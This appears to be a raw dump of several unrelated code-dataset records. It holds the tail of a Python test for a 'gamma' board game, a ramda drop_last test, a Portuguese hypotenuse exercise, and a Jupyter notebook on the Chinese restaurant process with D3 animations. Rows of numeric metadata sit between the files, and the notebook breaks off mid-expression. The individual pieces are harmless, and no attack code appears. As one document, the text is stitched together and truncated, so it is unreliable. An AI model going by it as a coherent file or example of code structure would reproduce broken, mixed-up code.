assert gamma_move(board, 5, 1, 4) == 0
assert gamma_move(board, 5, 2, 5) == 0
assert gamma_move(board, 1, 5, 4) == 0
assert gamma_move(board, 3, 5, 0) == 1
assert gamma_move(board, 3, 6, 3) == 1
assert gamma_golden_move(board, 3, 3, 1) == 0
assert gamma_move(board, 4, 3, 5) == 0
assert gamma_move(board, 4, 5, 4) == 0
assert gamma_move(board, 5, 0, 4) == 0
assert gamma_move(board, 1, 6, 5) == 0
assert gamma_move(board, 1, 7, 3) == 0
assert gamma_move(board, 2, 2, 5) == 0
assert gamma_move(board, 2, 4, 4) == 1
assert gamma_move(board, 3, 5, 4) == 0
assert gamma_move(board, 4, 2, 7) == 0
assert gamma_move(board, 4, 0, 0) == 1
assert gamma_busy_fields(board, 4) == 5
assert gamma_move(board, 5, 6, 1) == 0
assert gamma_move(board, 1, 4, 4) == 0
assert gamma_move(board, 1, 7, 4) == 1
assert gamma_move(board, 2, 0, 3) == 1
assert gamma_move(board, 3, 3, 3) == 1
assert gamma_move(board, 3, 7, 3) == 0
assert gamma_move(board, 4, 7, 5) == 1
assert gamma_move(board, 5, 1, 5) == 0
assert gamma_golden_move(board, 5, 5, 5) == 1
board768066899 = gamma_board(board)
assert board768066899 is not None
assert board768066899 == ("2...45..\n"
".533.514\n"
"31.324.1\n"
"24.3..31\n"
"51..5...\n"
"1.....51\n"
"44..2325\n")
del board768066899
board768066899 = None
assert gamma_move(board, 1, 3, 2) == 1
assert gamma_move(board, 1, 6, 3) == 0
assert gamma_busy_fields(board, 1) == 8
assert gamma_move(board, 2, 4, 0) == 0
assert gamma_move(board, 2, 3, 4) == 0
assert gamma_busy_fields(board, 2) == 5
assert gamma_golden_possible(board, 2) == 1
assert gamma_move(board, 3, 1, 4) == 0
assert gamma_move(board, 3, 3, 1) == 1
assert gamma_move(board, 4, 6, 1) == 0
assert gamma_move(board, 4, 0, 1) == 0
assert gamma_move(board, 5, 1, 4) == 0
assert gamma_move(board, 3, 1, 2) == 0
assert gamma_move(board, 4, 6, 4) == 1
assert gamma_move(board, 4, 5, 4) == 0
assert gamma_busy_fields(board, 4) == 7
assert gamma_free_fields(board, 5) == 21
assert gamma_move(board, 1, 6, 2) == 1
assert gamma_busy_fields(board, 1) == 9
assert gamma_move(board, 2, 2, 1) == 1
assert gamma_move(board, 3, 4, 2) == 0
assert gamma_free_fields(board, 3) == 19
assert gamma_move(board, 4, 0, 1) == 0
assert gamma_free_fields(board, 4) == 19
assert gamma_move(board, 5, 0, 3) == 0
board589089307 = gamma_board(board)
assert board589089307 is not None
assert board589089307 == ("2...45..\n"
".533.514\n"
"31.32441\n"
"24.3..31\n"
"51.15.1.\n"
"1.23..51\n"
"44..2325\n")
del board589089307
board589089307 = None
assert gamma_move(board, 1, 3, 2) == 0
assert gamma_move(board, 1, 7, 1) == 0
assert gamma_move(board, 2, 6, 7) == 0
assert gamma_move(board, 4, 0, 2) == 0
assert gamma_move(board, 4, 0, 3) == 0
assert gamma_move(board, 5, 1, 5) == 0
assert gamma_move(board, 1, 2, 2) == 1
assert gamma_golden_possible(board, 1) == 1
assert gamma_move(board, 2, 7, 1) == 0
assert gamma_move(board, 3, 2, 3) == 1
assert gamma_move(board, 4, 7, 0) == 0
assert gamma_move(board, 4, 2, 5) == 0
assert gamma_move(board, 5, 6, 2) == 0
assert gamma_golden_possible(board, 5) == 0
assert gamma_move(board, 1, 6, 2) == 0
assert gamma_golden_move(board, 1, 3, 6) == 0
assert gamma_move(board, 2, 0, 2) == 0
assert gamma_move(board, 3, 0, 6) == 0
assert gamma_move(board, 3, 0, 4) == 0
assert gamma_golden_move(board, 3, 6, 5) == 1
assert gamma_move(board, 4, 0, 2) == 0
assert gamma_move(board, 4, 3, 2) == 0
assert gamma_move(board, 5, 6, 7) == 0
assert gamma_move(board, 1, 0, 3) == 0
assert gamma_move(board, 1, 6, 4) == 0
assert gamma_busy_fields(board, 1) == 9
assert gamma_move(board, 2, 0, 3) == 0
assert gamma_move(board, 3, 4, 2) == 0
assert gamma_move(board, 3, 6, 1) == 0
assert gamma_move(board, 4, 1, 5) == 0
assert gamma_move(board, 4, 0, 3) == 0
assert gamma_move(board, 5, 5, 1) == 1
assert gamma_move(board, 1, 0, 2) == 0
assert gamma_move(board, 2, 6, 1) == 0
assert gamma_move(board, 2, 1, 4) == 0
assert gamma_move(board, 3, 6, 6) == 1
assert gamma_move(board, 4, 6, 2) == 0
assert gamma_move(board, 4, 5, 1) == 0
assert gamma_busy_fields(board, 4) == 7
assert gamma_move(board, 5, 6, 2) == 0
assert gamma_move(board, 5, 5, 5) == 0
assert gamma_free_fields(board, 5) == 15
assert gamma_move(board, 1, 0, 2) == 0
assert gamma_move(board, 1, 4, 5) == 1
assert gamma_move(board, 2, 5, 2) == 1
assert gamma_golden_possible(board, 2) == 1
assert gamma_move(board, 3, 5, 0) == 0
assert gamma_move(board, 4, 0, 2) == 0
assert gamma_busy_fields(board, 4) == 7
assert gamma_move(board, 5, 4, 2) == 0
assert gamma_move(board, 1, 4, 0) == 0
assert gamma_move(board, 1, 0, 3) == 0
assert gamma_move(board, 3, 6, 3) == 0
assert gamma_free_fields(board, 3) == 13
assert gamma_move(board, 4, 1, 1) == 1
assert gamma_free_fields(board, 4) == 12
assert gamma_move(board, 5, 2, 1) == 0
assert gamma_move(board, 1, 6, 3) == 0
assert gamma_move(board, 1, 3, 3) == 0
assert gamma_move(board, 2, 1, 3) == 0
assert gamma_golden_move(board, 2, 6, 5) == 1
assert gamma_move(board, 3, 7, 6) == 1
assert gamma_golden_move(board, 3, 6, 4) == 0
assert gamma_move(board, 4, 2, 5) == 0
assert gamma_move(board, 4, 1, 5) == 0
assert gamma_move(board, 5, 6, 5) == 0
assert gamma_move(board, 5, 7, 5) == 0
assert gamma_move(board, 1, 0, 0) == 0
assert gamma_move(board, 2, 3, 0) == 1
assert gamma_move(board, 3, 0, 4) == 0
assert gamma_free_fields(board, 3) == 10
assert gamma_move(board, 4, 2, 7) == 0
assert gamma_move(board, 4, 2, 1) == 0
assert gamma_move(board, 5, 5, 0) == 0
assert gamma_move(board, 1, 3, 4) == 0
assert gamma_move(board, 1, 3, 6) == 1
assert gamma_move(board, 2, 0, 0) == 0
assert gamma_move(board, 3, 7, 0) == 0
assert gamma_move(board, 4, 3, 4) == 0
assert gamma_move(board, 5, 4, 2) == 0
assert gamma_move(board, 5, 5, 6) == 0
assert gamma_move(board, 2, 2, 7) == 0
assert gamma_golden_move(board, 2, 2, 0) == 0
assert gamma_move(board, 3, 2, 1) == 0
assert gamma_golden_possible(board, 3) == 0
assert gamma_move(board, 4, 1, 4) == 0
assert gamma_move(board, 5, 6, 4) == 0
assert gamma_move(board, 5, 6, 6) == 0
assert gamma_move(board, 1, 1, 4) == 0
assert gamma_move(board, 1, 3, 2) == 0
assert gamma_move(board, 2, 1, 4) == 0
assert gamma_move(board, 3, 6, 2) == 0
assert gamma_move(board, 3, 0, 0) == 0
assert gamma_move(board, 4, 0, 2) == 0
assert gamma_golden_possible(board, 4) == 1
assert gamma_move(board, 5, 0, 6) == 0
assert gamma_move(board, 1, 1, 2) == 0
assert gamma_move(board, 2, 6, 2) == 0
assert gamma_free_fields(board, 2) == 6
gamma_delete(board)
| 34.415686
| 46
| 0.64984
| 1,654
| 8,776
| 3.298065
| 0.037485
| 0.383135
| 0.415215
| 0.553621
| 0.883776
| 0.880477
| 0.768836
| 0.486159
| 0.36462
| 0.36462
| 0
| 0.131502
| 0.182885
| 8,776
| 254
| 47
| 34.551181
| 0.629201
| 0
| 0
| 0.254237
| 0
| 0
| 0.024171
| 0
| 0
| 0
| 0
| 0
| 0.834746
| 1
| 0
| false
| 0
| 0.004237
| 0
| 0.004237
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b8ae272b00c0cc898806d7f041057bf332d328e3
| 268
|
py
|
Python
|
ramda/drop_last_test.py
|
Rafi993/pyramda
|
4fa7fe28d5eaa798b702d28bdd3948515cb88f48
|
[
"MIT"
] | 1
|
2018-08-05T04:41:14.000Z
|
2018-08-05T04:41:14.000Z
|
ramda/drop_last_test.py
|
Rafi993/pyramda
|
4fa7fe28d5eaa798b702d28bdd3948515cb88f48
|
[
"MIT"
] | 3
|
2018-06-12T18:42:05.000Z
|
2018-07-23T11:50:25.000Z
|
ramda/drop_last_test.py
|
slavaGanzin/pyramda
|
4fa7fe28d5eaa798b702d28bdd3948515cb88f48
|
[
"MIT"
] | null | null | null |
from .drop_last import drop_last
from ramda.private.asserts import assert_iterables_equal
def drop_nocurry_test():
assert_iterables_equal(drop_last(2, [1, 2, 3, 4]), [1, 2])
def drop_curry_test():
assert_iterables_equal(drop_last(2)([1, 2, 3, 4]), [1, 2])
| 24.363636
| 62
| 0.720149
| 46
| 268
| 3.891304
| 0.391304
| 0.178771
| 0.335196
| 0.268156
| 0.435754
| 0.435754
| 0.435754
| 0.435754
| 0.435754
| 0.435754
| 0
| 0.060606
| 0.13806
| 268
| 10
| 63
| 26.8
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b240394b07c6a2b8d77b42bd10772d8393841dba
| 561
|
py
|
Python
|
curso python/exercicios/mundo-1/ex015/catetoehipotenusa.py
|
lucasrenandns/Python-3
|
284b93a5538b3978d57593b5a664b1d2d98c6e1a
|
[
"MIT"
] | 1
|
2022-02-09T19:05:05.000Z
|
2022-02-09T19:05:05.000Z
|
curso python/exercicios/mundo-1/ex015/catetoehipotenusa.py
|
lucasrenandns/Python-3
|
284b93a5538b3978d57593b5a664b1d2d98c6e1a
|
[
"MIT"
] | null | null | null |
curso python/exercicios/mundo-1/ex015/catetoehipotenusa.py
|
lucasrenandns/Python-3
|
284b93a5538b3978d57593b5a664b1d2d98c6e1a
|
[
"MIT"
] | null | null | null |
from math import hypot
co = float(input("Digite o cateto oposto: "))
ca = float(input("Digite o cateto adjacente: "))
hi = hypot(co, ca)
print("A hipotenusa vai medir {:.2f}".format(hi))
'''co = float(input("Digite o cateto oposto: "))
ca = float(input("Digite o cateto adjacente: "))
hi = (co ** 2 + ca ** 2 ) ** (1/2)
print("A hipotenusa vai medir {:.2f}".format(hi))'''
'''import math
co = float(input("Digite o cateto oposto: "))
ca = float(input("Digite o cateto adjacente: "))
hi = math.hypot(co, ca)
print("A hipotenusa vai medir {:.2f}".format(hi))'''
| 35.0625
| 52
| 0.645276
| 88
| 561
| 4.113636
| 0.261364
| 0.165746
| 0.265193
| 0.281768
| 0.88674
| 0.88674
| 0.88674
| 0.88674
| 0.792818
| 0.792818
| 0
| 0.014675
| 0.149733
| 561
| 16
| 53
| 35.0625
| 0.744235
| 0
| 0
| 0
| 0
| 0
| 0.418848
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.2
| 0
| 0.2
| 0.2
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b27050ea010658548da412cae429eac1171d5a41
| 84,802
|
py
|
Python
|
_build/jupyter_execute/.~Dirichlet Distribution.py
|
dudaspm/LDA_Bias_Data
|
ffbabb5765a878bf49bac68baaa083342243a616
|
[
"BSD-3-Clause"
] | null | null | null |
_build/jupyter_execute/.~Dirichlet Distribution.py
|
dudaspm/LDA_Bias_Data
|
ffbabb5765a878bf49bac68baaa083342243a616
|
[
"BSD-3-Clause"
] | null | null | null |
_build/jupyter_execute/.~Dirichlet Distribution.py
|
dudaspm/LDA_Bias_Data
|
ffbabb5765a878bf49bac68baaa083342243a616
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
# # Dirichlet Distribution
# In[260]:
# In[261]:
# In[262]:
# In[1]:
from IPython.display import HTML
def load_d3_in_cell_output():
display(HTML("<script src='https://d3js.org/d3.v6.min.js'></script>"))
get_ipython().events.register('pre_run_cell', load_d3_in_cell_output)
# ## The Chinese Restaurant Process
# In the thought problem, we will be examing a situation where a hungery person (🤔) enters a restrauant and needs to choose a table (⚪).
#
# This original was developed by xxx and a great resource to consider is Pasupat's (xxx).
#
# Here are the ground rules for this thought problem.
#
# ## Rules for Our Thought Problem
# ### 1. An Infinite Amount of Tables (⚪)
#
# We are depicting five tables (⚪⚪⚪⚪⚪) but we need to consider a situation where the number of tables are infinite.
#
# * ⚪ = ∞
# ### 2. A Hungry Person (🤔) Only Two Options
#
# When a hungry person (🤔) walks into the the restraunt they have two options:
#
# * Either they sit a table (⚪) with someone else (😃)
# * or pick a new table (⚪)
#
# To simplify this, here a decision chart.
# In[2]:
from IPython.display import SVG, display
display(SVG(url='https://raw.githubusercontent.com/dudaspm/LDA_Bias_Data/main/images/startCondition.svg'))
# And to further reduce this down, we will be using this:
# In[3]:
from IPython.display import SVG, display
display(SVG(url='https://raw.githubusercontent.com/dudaspm/LDA_Bias_Data/main/images/simpleStartCondition.svg'))
# ### 3. Many ⚪ & 😃, Only One Empty ⚪
#
# This goes with #2, but in our scenario there will number of tables (⚪) with people (😃), but when considering an empty table (⚪). We will only consider *one* of the infinite number of tables (⚪) open. Another way to consider this is either a hungry person (🤔):
# * sits at the *one of possible many* tables (⚪) with someone else (😃)
# * *OR* they sit at the *one* new table (⚪)
# ### All Tables (⚪) are Equal
# Notice that all the tables are equal distance away. So, there is no weighting based on the distance and each table is equally likely to be picked.
# In[4]:
get_ipython().run_cell_magic('html', '', '<input type="button" onclick="runWeight()" value="Run Animation">\n<div id="runWeight"></div>\n\n<script type="text/javascript"> \n function runWeight() {\n var width = 500\n var height = 270\n var margin = 35\n var radius = 200\n \n d3.select("div#runWeight").select("svg").remove()\n var svg1 = d3.select("div#runWeight").append("svg")\n .attr("width", width)\n .attr("height", height)\n\n var x = d3.scaleLinear().domain([0,d3.range(5).length-1]).range([Math.PI, 2*Math.PI])\n\n svg1.selectAll("line")\n .data(d3.range(5))\n .join("line")\n .attr("x1", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y1", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("x2", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("stroke","darkgrey")\n .style("stroke-width", "10px")\n .style("stroke-linecap","round")\n .transition("line")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x2", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin)) \n\n svg1.selectAll("circle")\n // Collect\n .data(d3.range(5))\n // Update\n .join("circle")\n .attr("cx", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("r", (d,i)=> 30)\n .style("fill", "white")\n .style("stroke", "black")\n .style("stroke-width", "1px")\n .transition("circle")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("cx", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n\n svg1.append("text")\n .attr("x", width/2)\n .attr("y", (height-margin))\n .style("font-size","50px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text("🤔")\n }\n runWeight()\n</script>')
# ### Key for Thought Problem
#
# > 🤔 - hungry person
# * The person who needs to find a seat at a table
#
# > 😃 - person eating
# * A person already at a table
#
# > ⚪ - a possible table
# * A potential seat for the hungry person to sit at
#
# > ⚫ - a not possible table
# * Not a potential seat for the hungry person to sit at (see Rule #3)
# ## All Solutions 💥TO THE EXTREME💥
# :::{note}
# "To the extreme!" was a popular phrase from the early 1990s. Meaning "to take something to its furthest limits." Most credit [Robert Matthew Van Winkle](https://en.wikipedia.org/wiki/Vanilla_Ice) for the phrase.
# :::
# Now that we have our ground rules, let's approach this problem from, what I am calling, the extreme positions. Up to this point, we have not mentioned a single bit of math, but this section will contain conversations around probabilities. Here are three scenarios for our extreme positions.
#
# 1. The Social Butterfly
# 2. The Gambler
# 3. The Long Day
# ### 1. The Social Butterfly
#
# The social butterfly assumes every person that enters the restraunts wants to sit at the table with the most people.
# In[5]:
get_ipython().run_cell_magic('html', '', '<input type="button" onclick="social1()" value="Run Animation">\n<div id="social1"></div>\n\n<script type="text/javascript"> \n function social1() {\n var width = 500\n var height = 270\n var margin = 35\n var radius = 200\n \n d3.select("div#social1").select("svg").remove()\n var svg2 = d3.select("div#social1").append("svg")\n .attr("width", width)\n .attr("height", height)\n\n var x = d3.scaleLinear().domain([0,d3.range(5).length-1]).range([Math.PI, 2*Math.PI])\n\n svg2.selectAll("line")\n .data(d3.range(1))\n .join("line")\n .attr("x1", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y1", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("x2", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("stroke","darkgrey")\n .style("stroke-width", "10px")\n .style("stroke-linecap","round")\n .transition("line")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x2", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin)) \n\n svg2.selectAll("circle")\n // Collect\n .data(d3.range(5))\n // Update\n .join("circle")\n .attr("cx", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("r", (d,i)=> 30)\n .style("fill", (d,i)=> (i<=0)?"white":"black")\n .style("stroke", "black")\n .style("stroke-width", "1px")\n .transition("circle")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("cx", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n\n fractions = ["1","0","0","0","0"]\n svg2.selectAll("text")\n // Collect\n .data(fractions)\n // Update\n .join("text")\n .attr("x", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("r", (d,i)=> 30)\n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>d)\n .transition("text")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n \n \n \n svg2.append("text")\n .attr("x", width/2)\n .attr("y", (height-margin))\n .style("font-size","50px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text("🤔")\n }\n social1()\n</script>')
# In[6]:
get_ipython().run_cell_magic('html', '', '<input type="button" onclick="social2()" value="Run Animation">\n<div id="social2"></div>\n\n<script type="text/javascript"> \n function social2() {\n var width = 600\n var height = 300\n var margin = 55\n var radius = 200\n \n d3.select("div#social2").select("svg").remove()\n var svg3 = d3.select("div#social2").append("svg")\n .attr("width", width)\n .attr("height", height)\n\n var x = d3.scaleLinear().domain([0,d3.range(5).length-1]).range([Math.PI, 2*Math.PI])\n\n svg3.selectAll("line")\n .data(d3.range(2))\n .join("line")\n .attr("x1", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y1", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("x2", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("stroke","darkgrey")\n .style("stroke-width", "10px")\n .style("stroke-linecap","round")\n .transition("line")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x2", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin)) \n\n svg3.selectAll("circle")\n // Collect\n .data(d3.range(5))\n // Update\n .join("circle")\n .attr("cx", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("r", (d,i)=> 30)\n .style("fill", (d,i)=> (i<=1)?"white":"black")\n .style("stroke", "black")\n .style("stroke-width", "1px")\n .transition("circle")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("cx", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n\n fractions = ["1/1","0","0","0","0"]\n svg3.selectAll("text.perc")\n // Collect\n .data(fractions)\n // Update\n .join("text")\n .attr("class","perc")\n .attr("x", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>d)\n .transition("text")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n \n \n \n svg3.append("text")\n .attr("class","hungry")\n .attr("x", width/2)\n .attr("y", (height-margin))\n .style("font-size","50px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text("🤔")\n \n function addPeople(cx,cy,e,s) {\n var xc = d3.scaleLinear().domain([0,d3.range(e).length]).range([Math.PI, 3*Math.PI])\n s.selectAll("text.feed")\n // Collect\n .data(d3.range(e))\n // Update\n .join("text")\n .attr("class","feed")\n .attr("x", cx)\n .attr("y", cy) \n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>"😃")\n .transition("text2")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((40) * Math.cos(xc(i))) + cx)\n .attr("y", (d,i)=> ((40) * Math.sin(xc(i))) + cy)\n \n \n }\n var cx = ((radius) * Math.cos(x(0))) + (width/2)\n var cy = ((radius) * Math.sin(x(0))) + (height-margin)\n addPeople(cx,cy,1,svg3)\n }\n social2()\n</script>')
# In[7]:
get_ipython().run_cell_magic('html', '', '<input type="button" onclick="social3()" value="Run Animation">\n<div id="social3"></div>\n\n<script type="text/javascript"> \n function social3() {\n var width = 600\n var height = 300\n var margin = 55\n var radius = 200\n \n d3.select("div#social3").select("svg").remove()\n var svg4 = d3.select("div#social3").append("svg")\n .attr("width", width)\n .attr("height", height)\n\n var x = d3.scaleLinear().domain([0,d3.range(5).length-1]).range([Math.PI, 2*Math.PI])\n\n svg4.selectAll("line")\n .data(d3.range(2))\n .join("line")\n .attr("x1", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y1", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("x2", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("stroke","darkgrey")\n .style("stroke-width", "10px")\n .style("stroke-linecap","round")\n .transition("line")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x2", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin)) \n\n svg4.selectAll("circle")\n // Collect\n .data(d3.range(5))\n // Update\n .join("circle")\n .attr("cx", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("r", (d,i)=> 30)\n .style("fill", (d,i)=> (i<=1)?"white":"black")\n .style("stroke", "black")\n .style("stroke-width", "1px")\n .transition("circle")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("cx", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n\n fractions = ["2/2","0","0","0","0"]\n svg4.selectAll("text.perc")\n // Collect\n .data(fractions)\n // Update\n .join("text")\n .attr("class","perc")\n .attr("x", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>d)\n .transition("text")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n \n \n \n svg4.append("text")\n .attr("class","hungry")\n .attr("x", width/2)\n .attr("y", (height-margin))\n .style("font-size","50px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text("🤔")\n \n function addPeople(cx,cy,e,s) {\n var xc = d3.scaleLinear().domain([0,d3.range(e).length]).range([Math.PI, 3*Math.PI])\n s.selectAll("text.feed")\n // Collect\n .data(d3.range(e))\n // Update\n .join("text")\n .attr("class","feed")\n .attr("x", cx)\n .attr("y", cy) \n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>"😃")\n .transition("text2")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((40) * Math.cos(xc(i))) + cx)\n .attr("y", (d,i)=> ((40) * Math.sin(xc(i))) + cy)\n \n \n }\n var cx = ((radius) * Math.cos(x(0))) + (width/2)\n var cy = ((radius) * Math.sin(x(0))) + (height-margin)\n addPeople(cx,cy,2,svg4)\n }\n social3()\n</script>')
# In[8]:
get_ipython().run_cell_magic('html', '', '<input type="button" onclick="social4()" value="Run Animation">\n<div id="social4"></div>\n\n<script type="text/javascript"> \n function social4() {\n var width = 600\n var height = 300\n var margin = 55\n var radius = 200\n \n d3.select("div#social4").select("svg").remove()\n var svg5 = d3.select("div#social4").append("svg")\n .attr("width", width)\n .attr("height", height)\n\n var x = d3.scaleLinear().domain([0,d3.range(5).length-1]).range([Math.PI, 2*Math.PI])\n\n svg5.selectAll("line")\n .data(d3.range(2))\n .join("line")\n .attr("x1", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y1", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("x2", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("stroke","darkgrey")\n .style("stroke-width", "10px")\n .style("stroke-linecap","round")\n .transition("line")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x2", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin)) \n\n svg5.selectAll("circle")\n // Collect\n .data(d3.range(5))\n // Update\n .join("circle")\n .attr("cx", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("r", (d,i)=> 30)\n .style("fill", (d,i)=> (i<=1)?"white":"black")\n .style("stroke", "black")\n .style("stroke-width", "1px")\n .transition("circle")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("cx", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n\n fractions = ["3/3","0","0","0","0"]\n svg5.selectAll("text.perc")\n // Collect\n .data(fractions)\n // Update\n .join("text")\n .attr("class","perc")\n .attr("x", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>d)\n .transition("text")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n \n \n \n svg5.append("text")\n .attr("class","hungry")\n .attr("x", width/2)\n .attr("y", (height-margin))\n .style("font-size","50px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text("🤔")\n \n function addPeople(cx,cy,e,s) {\n var xc = d3.scaleLinear().domain([0,d3.range(e).length]).range([Math.PI, 3*Math.PI])\n s.selectAll("text.feed")\n // Collect\n .data(d3.range(e))\n // Update\n .join("text")\n .attr("class","feed")\n .attr("x", cx)\n .attr("y", cy) \n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>"😃")\n .transition("text2")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((40) * Math.cos(xc(i))) + cx)\n .attr("y", (d,i)=> ((40) * 